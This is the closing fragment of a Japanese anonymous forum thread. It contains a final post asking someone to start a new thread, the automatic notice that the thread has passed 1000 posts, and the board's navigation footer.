1000 :名無しさん@お腹いっぱい。:2009/04/10(金) 20:45:17
次スレ誰か立ててくれ

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

250 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)